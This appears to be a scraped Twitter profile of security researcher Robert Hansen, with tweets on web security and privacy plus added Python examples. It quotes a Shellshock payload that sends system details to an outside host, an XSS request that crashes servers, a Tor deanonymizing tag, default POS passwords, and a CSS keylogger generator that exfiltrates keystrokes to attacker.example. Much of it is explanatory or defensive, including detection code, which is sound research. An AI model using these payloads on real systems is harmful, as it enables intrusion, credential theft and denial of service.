Your security program summarized (probably):
Robert Hansen
@RSnake
Deputy CTO, vCISO, defender of others' privacy, AI hacker, Advisor, often found joking.
Robert Hansen’s posts
Hacker life be like: gzcat dump.gz | cut -f 1 -d ":" | tr '[:upper:]' '[:lower:]' | egrep "^[a-z0-9\-]+.*@.+" | sort | uniq > emails.txt
Equifax's surface area for anyone curious: analysis.outsideintel.com/equifax.txt
If you use Express VPN you definitely need to read this:
Me: “I wonder what the right regex for checking emails is.”
The Internet: 😑
It turns out ~90% of credit card POS terminals use one of two passwords, 166816 or Z66816.
XSS BSOD <script>var c=new XMLHttpRequest();c.open('GET','/');c.setRequestHeader('Range','bytes=18-18446744073709551615');c.send();</script>
Wait, was this a 16 bit integer overflow the U2 caused when flying at 65,535+ feet?
If you're wondering, “Should I update my iPhone today?” Yes, yes you should:
Wow, Flash is dead and now so too is Java Applets!
Detecting Tor users can be as simple as putting up a Tor hidden service and linking to it: <img src="//[whatever].onion/?[user-ip-address]">
Useful default test financial data for pentesters. Don’t forget to disable test data in prod peeps.
“dolphins” is now a safe password, feel free to use it: github.com/danielmiessler
Cool, if you can inject into people’s CSS files you can use it to do keystroke logging without JS or breaking inline JS rules via CSP in the process: github.com/maxchehab/CSS-
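To make the attack concrete, here is an added Python example (written for this page, not code from the tweet or from the maxchehab repository) that builds the attribute-selector stylesheet and turns the resulting image requests back into keystrokes. The exfiltration host attacker.example and the query parameter `c` are assumptions, and the technique only works when the target page mirrors each field's live value into its `value` attribute, which some frameworks do and a plain HTML input does not.

```python
# Added example, not code from the tweet or the maxchehab repository.
# Assumptions: attacker.example is a hypothetical exfil host, and the target
# page mirrors each field's live value into its `value` attribute (some
# frameworks do this; a plain <input> does not, so the selectors never match).
import string
from urllib.parse import parse_qs, quote, urlsplit

EXFIL = "https://attacker.example/k"  # hypothetical collection endpoint


def css_keylogger(selector='input[type="password"]',
                  alphabet=string.ascii_letters + string.digits,
                  endpoint=EXFIL):
    """Emit one rule per character. `[value$="x"]` matches while the field's
    value ends in x, and the matching rule's background-image makes the
    browser fetch a URL that names x. No script runs, so a CSP script-src
    directive (inline or otherwise) never comes into play."""
    rules = []
    for ch in alphabet:
        rules.append(
            f'{selector}[value$="{ch}"] '
            f'{{ background-image: url("{endpoint}?c={quote(ch)}"); }}'
        )
    return "\n".join(rules)


def recover_keystrokes(request_paths):
    """Turn the exfil endpoint's request log (request paths in arrival order)
    back into the characters that were typed."""
    typed = []
    for path in request_paths:
        char = parse_qs(urlsplit(path).query).get("c")
        if char:
            typed.append(char[0])
    return "".join(typed)


if __name__ == "__main__":
    print(css_keylogger(alphabet="ab"))
    # Constructed request log as it would arrive at attacker.example:
    print(recover_keystrokes(["/k?c=h", "/k?c=u", "/k?c=n", "/k?c=t"]))
```

Two caveats a tester will hit: the browser caches the background image, so the same character typed twice in a row produces one request unless the payload varies the URL, and the defence is on the style side, not the script side: a CSP `style-src` directive that forbids injected stylesheets, a tight `img-src`, and not reflecting secrets into DOM attributes in the first place.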
Make sure to delete all of the recordings Google has of you (and tell your friends to do the same): history.google.com/history/audio
ImageMagick's ghostlib has a remote code execution exploit. If your site processes images, patch up: ghostbutt.com
I hung out with someone who got the COVID vaccine and I’m sad to report my 5g cell phone reception has not improved at all.
I’m disappointed to hear about Google today. They had a social product and didn’t tell anyone?
If your site collects PII you’ve got one month left before Google will mark it as insecure for not using HTTPS: plus.google.com/+GoogleWebmast
I published a list of HTTP Response headers for reference: blog.whitehatsec.com/list-of-http-r
RIP James Flom (id) and his girlfriend Shannon Norton. James was my best friend.
Me doing my duties on the review board. Reviewing security talks requires hacker gear.
Venezuela’s Bolivars are worth so little they may start causing issues with exchanges who round to the nearest fraction of pennies.
PSA - the command to detach a GNU screen (Control-A Control-D) is the same command in Outlook that selects all your email... and then deletes all of your email. Fun times.
I wonder how many kids will grow up thinking Alexa, Siri and Ok Google pronounce things correctly.
IPv6 is… interesting. Your security/log analysis tool might require an update to normalize the addresses:
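An added example of the normalization step the tweet is asking for (mine, not from the tweet or its attachment): the same IPv6 host can appear in a log as uppercase hex, with leading zeros, fully expanded or `::`-compressed, wrapped in `[...]:port`, with a `%zone` suffix, or as an IPv4-mapped `::ffff:a.b.c.d`, and a tool that keys on the raw string counts each spelling as a different client. The log lines are constructed.

```python
# Added example, not from the tweet. The log lines below are constructed.
import ipaddress
import re

_BRACKETED = re.compile(r"^\[([^\]]+)\](?::\d+)?$")  # [addr] or [addr]:port


def normalize_ip(text):
    """Return one canonical string for every way an address may be written:
    uppercase hex, leading zeros, expanded vs. :: compression, a [brackets]:port
    wrapper, a %zone suffix, or an IPv4 address wrapped as ::ffff:a.b.c.d."""
    s = text.strip()
    m = _BRACKETED.match(s)
    if m:
        s = m.group(1)
    s = s.split("%", 1)[0]          # drop link-local zone id (fe80::1%eth0)
    addr = ipaddress.ip_address(s)  # raises ValueError on garbage
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        return str(addr.ipv4_mapped)  # ::ffff:192.0.2.1 -> 192.0.2.1
    return str(addr)                  # compressed lowercase form


def subnet_key(normalized):
    """Aggregation key: a single IPv6 host normally has a whole /64 to rotate
    addresses within, so rate limits and block lists should key on the /64."""
    addr = ipaddress.ip_address(normalized)
    if addr.version == 6:
        return str(ipaddress.ip_network(f"{addr}/64", strict=False))
    return str(addr)


SAMPLE_LOG = [  # constructed: "<client> - <request>"
    "2001:DB8::1 - GET /login",
    "2001:0db8:0000:0000:0000:0000:0000:0001 - POST /login",
    "[2001:db8::1]:53122 - GET /",
    "::ffff:192.0.2.1 - GET /",
    "192.0.2.1 - GET /",
    "2001:db8::dead:beef - GET /login",
]


def count_by_client(lines, by_subnet=False):
    """Requests per client after normalization; with by_subnet=True,
    IPv6 clients are folded into their /64."""
    counts = {}
    for line in lines:
        raw = line.split(" - ", 1)[0]
        key = normalize_ip(raw)
        if by_subnet:
            key = subnet_key(key)
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    print(count_by_client(SAMPLE_LOG))
    print(count_by_client(SAMPLE_LOG, by_subnet=True))
```

Without normalization the six lines look like six clients; with it they collapse to two hosts (three distinct addresses), and with /64 aggregation to one IPv6 prefix plus one IPv4 host.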
A nice JS de-obfuscation tool - Revelo 2.0 released: kahusecurity.com/2015/revelo-up
Apparently Adobe has finally agreed with what security experts have been saying for years: theverge.com/2015/12/1/9827 Java applets next.
I’m happy to announce that OutsideIntel was acquired by Bit Discovery: smartphoneexec.com/outsideintel-a
If you use Firefox, type about:config click through type privacy.trackingprotection.enabled and change the value to “true”
In light of all these DDoS attacks, I wrote a DDoS runbook: blog.whitehatsec.com/checklist-to-p
Another day, another exchange gets hacked and goes under. It almost feels like crypto exchanges are unsafe. Hmm... t.co/rmeSVwLNRF
PSA: If you spam a conference with 15 submissions from your company it takes ~15 seconds to reject all of them.
Whew! What a ride!!
Quote
We have officially acquired @BitDiscovery, a leader in external #attacksurface management (EASM). Paired with our market-leading solutions, customers will have a comprehensive view into known and previously unknown internet-facing assets. tenable.com/press-releases
Secretary Fanning announcing “Hack the Army” Recruitment sites are in scope and open to .mil personnel.
If you use Gmail, I highly recommend changing this email image setting: support.google.com/mail/answer/14
Lexington Insurance Company and Beazley Insurance Company are suing Trustwave over Heartland breach: bleepingcomputer.com/news/security/
Ugh, disable Alexa Drop-In. It tells people when you're home. *shudder* Privacy disaster zone.
Finally got around to donating the XSS cheat sheet to http://t.co/EI1zI9AK Now everyone can edit/modify at will.
First of three parts: "Interview with a Blackhat" blog.whitehatsec.com/interview-with
I’d expect huge layoffs tomorrow (Friday). Be nice to everyone. The chances are a lot of people and their families are going to have a very rough day tomorrow. #COVID19
One week remaining before Google marks http sites insecure if they have forms. Shhh, don’t tell your competitors.
Extremely accurate drone strike with a grenade. Pretty impressive delivery mechanism for tight seemingly impenetrable/austere conditions.
Quote
Ho Ho Ho! #MeryChristmas #WesołychŚwiąt 
Throwing gifts into the chimney of Russian invaders
by Ukrainian defenders. #Ukraine #GloryToUkraine
Are you *certified* not CISSP? Has someone checked your uncertification requirement to use that title?
Time to make your smart TV’s dumb again and disconnect them. Exploit in HbbTV:
Tor hidden services decloaking technique blog.whitehatsec.com/tor-hidden-ser
It’s generally not a great sign when an agency refuses to say if they have any information about you, I’m guessing.
GDPR privacy changes already being deployed by some registrars. Whois is already being neutered in some cases:
It's always the weakest link, isn't it? Compromised printers can compromise Windows boxes via malicious drivers: blog.vectranetworks.com/blog/microsoft
PSA: Updating your phone and all apps before going to Blackhat/DefCon/BSidesLV is a good idea. Or better yet, don't bring them at all.
Useful little JavaScript tool to decode BigIP cookies: blog.whitehatsec.com/f5-networks-bi
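The format that tool decodes is simple enough to carry in a few lines of Python; the example below is mine, not the WhiteHat tool. The classic `BIGipServer<pool>` persistence cookie is `<ip>.<port>.0000`, where `<ip>` is the backend's IPv4 address read as a little-endian 32-bit integer and `<port>` is the backend TCP port with its two bytes swapped, so a cookie leaks the internal address and port of the pool member behind the load balancer. The cookie values below are constructed.

```python
# Added example, not the tool from the WhiteHat post. Cookie values below are
# constructed. The classic BIGipServer<pool> value is "<ip>.<port>.0000" where
# <ip> is the IPv4 address as a little-endian 32-bit integer and <port> is the
# TCP port with its two bytes swapped.
import re
import struct

_CLASSIC = re.compile(r"^(\d+)\.(\d+)\.0000$")
_COOKIE = re.compile(r"BIGipServer([^=;\s]*)=([^;\s]*)")


def decode_bigip(value):
    """'1677787402.36895.0000' -> ('10.1.1.100', 8080)."""
    m = _CLASSIC.match(value.strip())
    if not m:
        # IPv6 and route-domain encodings (values starting "rd" or "vi")
        # exist and are deliberately not handled here.
        raise ValueError(f"not a classic BIGipServer value: {value!r}")
    ip_int, port_int = int(m.group(1)), int(m.group(2))
    if ip_int > 0xFFFFFFFF or port_int > 0xFFFF:
        raise ValueError("field out of range")
    ip = ".".join(str(b) for b in struct.pack("<I", ip_int))   # little-endian bytes
    (port,) = struct.unpack(">H", struct.pack("<H", port_int))  # byte-swapped port
    return ip, port


def find_bigip_cookies(header):
    """Scan a Cookie / Set-Cookie header value and decode every classic
    BIGipServer cookie in it. Returns [(pool_name, backend_ip, backend_port)]."""
    found = []
    for pool, value in _COOKIE.findall(header):
        try:
            ip, port = decode_bigip(value)
        except ValueError:
            continue
        found.append((pool, ip, port))
    return found


if __name__ == "__main__":
    # Constructed header, as it might appear in a captured response:
    print(find_bigip_cookies("BIGipServerpool_web=1677787402.36895.0000; path=/; HttpOnly"))
```

The remediation on the F5 side is cookie encryption for the persistence profile; on the assessment side the decoded value is a finding (internal addressing disclosure), not a foothold by itself.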
Facebook: Settings->Account settings->Ads->Manage the Preferences We Use To Show You Ads->Visit Ad Preferences->More
Tor SSL downgrade attacks being performed. Moral of the story? Don’t trust the exit node:
Regarding breach disclosure: it occurred to me that companies could use the spammiest looking content with the worst keywords from the shadiest RBL IP ranges and send it out as fast as possible so that it gets caught by anti-spam filters.
If you use a Symantec/Thawte/Verisign/Equifax/Geotrust/RapidSSL cert, you'll be needing to replace that: security.googleblog.com/2017/09/chrome
“You don’t want a doctor to have to go through a forgot password flow with a patient on the table.” “I’d hate to see a corpse with its privacy intact.” Wrt optimizing for human life over privacy -
Wow - this could get very interesting for the pen testing/assessment industry. Banks sue Trustwave for Target breach: http://t.co/D0moZ59xZg
Is it me or did the Internet miss a golden opportunity to name the log4j vuln “logjam”?
Formaction scriptless attack (HTML5 fun): blog.whitehatsec.com/hackerkast-29-
Don’t forget to block those site/ad trackers, kids. Google Analytics especially.
Quote
Google's tracking has grown since the GDPR came into force while its smaller rivals have been obliterated. cliqz.com/en/magazine/st
News Outlets, “Bad actors are trying to make money off of the coronavirus crisis.”
Also News Outlets, “You can’t see our clickbait until you enable ads.”
If you enter a “0” and your hash starts with “0e...” it will match in PHP: news.ycombinator.com/item?id=9484757
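An added example (mine, not from the linked Hacker News thread) that models the PHP rule behind this in Python so it can be demonstrated without a PHP interpreter. PHP's `==` compares two strings numerically when both parse as numbers, exponent notation included, so a hex digest of the form `0e<digits>` is the number 0 times 10 to something and equals `"0"` and every other such digest. The inputs are the well-known md5 preimages `240610708` and `QNKCDZO`, whose digests both start with `0e`.

```python
# Added example, not from the linked HN thread. Models PHP's numeric-string
# comparison in Python; the inputs are the well-known md5 "0e" preimages.
import hashlib
import hmac
import re

# PHP treats a string as numeric if it parses as a decimal number, optional
# exponent included; "0e4620..." is therefore the number 0 * 10^4620....
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equals(a, b):
    """Python model of PHP's `$a == $b` for two strings: when both look
    numeric they are compared as numbers, otherwise as strings."""
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hexdigest):
    """A hex digest of the form 0e<digits only> compares == to "0" and to
    every other such digest under the loose rule above."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None


def strict_equals(a, b):
    """The fix: compare the bytes, in constant time (PHP: hash_equals or ===)."""
    return hmac.compare_digest(a.encode(), b.encode())


def check_password_loose(stored_md5, candidate):
    """Vulnerable pattern: md5($candidate) == $stored."""
    return php_loose_equals(stored_md5, hashlib.md5(candidate.encode()).hexdigest())


def check_password_strict(stored_md5, candidate):
    """Hardened pattern: hash_equals($stored, md5($candidate))."""
    return strict_equals(stored_md5, hashlib.md5(candidate.encode()).hexdigest())


if __name__ == "__main__":
    stored = hashlib.md5(b"240610708").hexdigest()   # 0e462097431906509019562988736854
    print(stored, is_magic_hash(stored))
    print("loose  QNKCDZO:", check_password_loose(stored, "QNKCDZO"))   # True: wrong password accepted
    print("strict QNKCDZO:", check_password_strict(stored, "QNKCDZO"))  # False
```

The same rule bites token and signature checks that compare a user-supplied hex string against a computed one with `==`; `hash_equals()` (or `===`) is the fix, and it is also constant-time, which `==` is not.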
Russia is just DDoSing to help the US with work-life balance and to that we say thank you.
10 proactive security things to think about as you're building your web app: blog.whitehatsec.com/top-10-proacti
For UFO VPN, FAST VPN, Free VPN, Super VPN, Flash VPN, Secure VPN, and Rabbit VPN users out there:
WhiteHat Aviator: a safer, more private and faster browser for OSX: blog.whitehatsec.com/introducing-wh
I think this inadvertently proved using Stripe is risky business.
Quote
Today @stripe blocked our account and held all the money that we charged via @backerkit for shipping of #FlipperZero. Explaining this by the fact that we have a “risky business”. Pretty weird considering that Stripe already processed all our Kickstarter payments before.
Biometrics aren't sufficiently different from tattooing your password on yourself somewhere.
A little tool I wrote to help detect if your DNS has been hijacked: blog.whitehatsec.com/dnstest-monito
One of the worst parts about this for me isn’t that it happened, or what it implies, but how common this kind of spaghetti coding is becoming. He names almost every modern language and tons of frameworks. Try threat modeling that mess.
Once upon a time a boss of mine asked me if I got an email an executive had sent but I wasn’t certain. So he asked one of my co-workers who was sitting next to me to forward it over. Sure enough I had gotten it but when I was looking at the two emails side by side they seemed…
Shellshock in the wild: () { :; }; /usr/bin/wget -qO - x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`
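An added detection example (mine, not from either tweet) that covers this Shellshock probe and the oversized `Range` request in the XSS BSOD tweet above (the HTTP.sys integer overflow Microsoft fixed in MS15-034): Python that scans access-log lines for both. The log format is assumed, `client "request" status "User-Agent" "Range"`, i.e. a custom LogFormat that records the Range header, which the stock combined format does not; the lines themselves are constructed.

```python
# Added example; the log lines and their format are constructed.
import re

# The Shellshock trigger is the function-definition prefix "() {", whatever
# command follows it, in any header the CGI layer exports as an env var.
SHELLSHOCK = re.compile(r"\(\)\s*\{")

# A byte range whose endpoint does not fit a signed 64-bit integer is never a
# legitimate request; 18446744073709551615 in the tweet is 2**64 - 1.
_RANGE_PAIR = re.compile(r"(\d*)-(\d*)")
INT64_MAX = 2**63 - 1


def range_is_suspicious(range_header):
    """True if any start/end offset in a bytes= Range header exceeds INT64_MAX."""
    if not range_header.startswith("bytes="):
        return False
    for lo, hi in _RANGE_PAIR.findall(range_header[len("bytes="):]):
        if any(v and int(v) > INT64_MAX for v in (lo, hi)):
            return True
    return False


# Assumed log format: client "request" status "User-Agent" "Range" ("-" if absent)
_LINE = re.compile(
    r'^(?P<client>\S+) "(?P<request>[^"]*)" (?P<status>\d{3}) '
    r'"(?P<ua>[^"]*)" "(?P<range>[^"]*)"$'
)

SAMPLE_LOG = [  # constructed
    '203.0.113.5 "GET /cgi-bin/status HTTP/1.1" 200 '
    '"() { :; }; /usr/bin/wget -qO - http://198.51.100.9/gate" "-"',
    '203.0.113.6 "GET / HTTP/1.1" 200 "Mozilla/5.0" "bytes=18-18446744073709551615"',
    '203.0.113.7 "GET /video.mp4 HTTP/1.1" 206 "Mozilla/5.0" "bytes=0-1048575"',
    '203.0.113.8 "GET / HTTP/1.1" 200 "curl/7.68.0" "-"',
]


def scan(lines):
    """Return [(client, rule_name)] for every line that trips a rule."""
    hits = []
    for line in lines:
        m = _LINE.match(line)
        if not m:
            continue  # not in the expected format; a real tool would count these
        if SHELLSHOCK.search(m["ua"]) or SHELLSHOCK.search(m["request"]):
            hits.append((m["client"], "shellshock"))
        if m["range"] != "-" and range_is_suspicious(m["range"]):
            hits.append((m["client"], "oversized-range"))
    return hits


if __name__ == "__main__":
    for client, rule in scan(SAMPLE_LOG):
        print(client, rule)
```

Both rules are cheap enough to run inline at a proxy as well as over logs; the Range rule is also a reasonable thing to enforce outright, since no real client asks for an offset beyond 2^63.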
Wow - only took the browser companies 18 years to figure out intranet port scanning + CSRF was a real problem. ;) twitter.com/campuscodi/sta
Intranet hacking using JS. Yes, it’s still a problem that browsers are vulnerable to and are being exploited with even more than a decade later: hacking.reviews/2018/10/ghostd /cc
Lying to your security staff is like lying to your psychiatrist - you’re only hurting yourself.